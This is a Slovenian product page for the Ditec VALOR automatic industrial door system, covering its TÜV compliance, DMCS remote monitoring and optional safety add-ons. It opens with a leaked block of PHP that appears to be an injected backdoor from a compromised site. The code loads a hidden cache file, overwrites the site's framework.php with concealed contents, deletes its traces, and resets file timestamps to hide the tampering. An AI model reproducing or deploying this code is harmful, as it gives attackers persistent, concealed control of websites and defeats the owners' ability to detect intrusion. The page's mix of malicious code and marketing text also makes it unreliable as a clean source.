$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Avtomatska vrata - FREEZE SYSTEM - Sistem VALOR

Sistem VALOR

Sistem VALOR

Ditec VALOR avtomatizacija, ki izpolnjuje vse standarde TÜV, je tehnološko zelo napreden sistem in zato primeren za težko in kontinuirano uporabo. Obenem vam zagotavlja preprost oddaljen nadzor s pomočjo sistema DMCS (Door Monitoring & Controlling System), ki omogoča nadziranje večjega števila dostopov. Avtomatizacija se lahko nadgradi tudi z različnimi dodatnimi napravami (proti neželenemu stisku, detekcija ovir, nastavljiva hitrost za odpiranje in zapiranje itd.) – vse to pa izdelek naredi še bolj zanesljiv in varen za uporabo, še posebno na točkah z veliko pretočnostjo. VALOR avtomatizacija pomeni tudi zelo tiho delovanje, prijeten izgled ter zanesljivost delovanja v različnih okoljskih pogojih.

Poleg dejstva, da so vrata praktična, varna, prijetna za oko, sposobna kontrolirati pretočnost ter energetsko varčna za objekte s klimatiziranim ozračjem, vam VALOR ponuja najnovejše pridobitve na področju proizvodnje industrijskih vrat z vgradnjo nove generacije elektromehanskih komponent in zelo inovativno nadzorno ploščo.

TEHNIČNE ZNAČILNOSTI:

valor_teh